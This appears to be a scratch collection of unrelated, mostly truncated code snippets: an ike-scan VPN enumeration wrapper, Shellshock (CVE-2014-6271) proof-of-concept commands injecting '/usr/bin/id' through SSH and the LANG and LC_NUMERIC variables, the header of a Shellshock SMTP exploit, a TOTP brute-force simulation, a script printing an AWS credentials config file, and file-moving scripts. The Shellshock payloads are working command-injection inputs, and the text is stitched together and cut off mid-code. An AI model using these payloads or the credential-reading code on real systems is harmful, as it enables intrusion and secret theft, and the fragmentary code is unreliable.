# A quick and dirty ike-scan wrapper to enumerate
# supported transform sets and vendor ID fingerprints
# on IPSec VPN Endpoints.
#
# Example Targeted Run Output
#
#$ rvmsudo ruby harvest.rb --targets 192.168.1.1 --enc-types 5 --hash-types 2 --dh-types 2 --auth-types 1
#I, [2013-08-12T23:53:14.490138 #27197] INFO -- : 5 transform combinations to try
#D, [2013-08-12T23:53:14.490221 #27197] DEBUG -- : Trying ike-scan --multiline 192.168.1.1
#I, [2013-08-12T23:53:14.726363 #27197] INFO -- : Found a new VID VID=5b362bc820f60001

$ worm parse

# Almost Original SSH PoC for CVE-2014-6271 (Ref: http://seclists.org/oss-sec/2014/q3/651)
ssh claudijd@192.168.10.105 '() { ignored; }; /usr/bin/id'
# Note: this pollutes the SSH_ORIGINAL_COMMAND env variable, but what about vars we can set?
# Alternative SSH PoC Injection Points for CVE-2014-6271
LANG='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105
LC_NUMERIC='() { ignored; }; /usr/bin/id' ssh claudijd@192.168.10.105

>> require 'socket'
=> true
>> require 'openssl'
=> true
>>
?> ssl_context = OpenSSL::SSL::SSLContext.new
=> #<OpenSSL::SSL::SSLContext:0x007ffc9a9deb00>
>> ssl_context.verify_mode = OpenSSL::SSL::VERIFY_PEER
=> 1
>> cert_store = OpenSSL::X509::Store.new

import json
import requests
import pdb
import os
BASE_URL = "https://auth.mozilla.auth0.com"
def get_bearer_token():
    url = BASE_URL + '/oauth/token'

# A proof of concept to demonstrate TOTP bruteforcing concepts
# Parameters to control simulation behavior###
request_rate = 4
totp_validity_window = 90 #in seconds
totp_guesses_per_auth_session = request_rate * totp_validity_window # number of totp guesses per auth session
simulated_logins = 100 # number of simulated logins to help determine average rate of TOTP collision
##############################################
# Helper Methods

#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271

# Use a context manager so the file handle is closed after reading
with open("/Users/jclaudius/.aws/config", "r") as log:
    for line in log:
        print(line)

import glob
import os
import os.path
import shutil
mydir = "/Users/jclaudius/Downloads/"
filelist = glob.glob(os.path.join(mydir, "*"))
for f in filelist:
    if os.path.isdir(f):

import os
import shutil
path = "/Users/jclaudius/Desktop/"
moveto = "/Users/jclaudius/Desktop/Archive/"
files = os.listdir(path)
files.sort()
for f in files:
    # os.listdir returns bare names, so test the full path rather than a name relative to the cwd
    if not os.path.isdir(path + f):
        src = path+f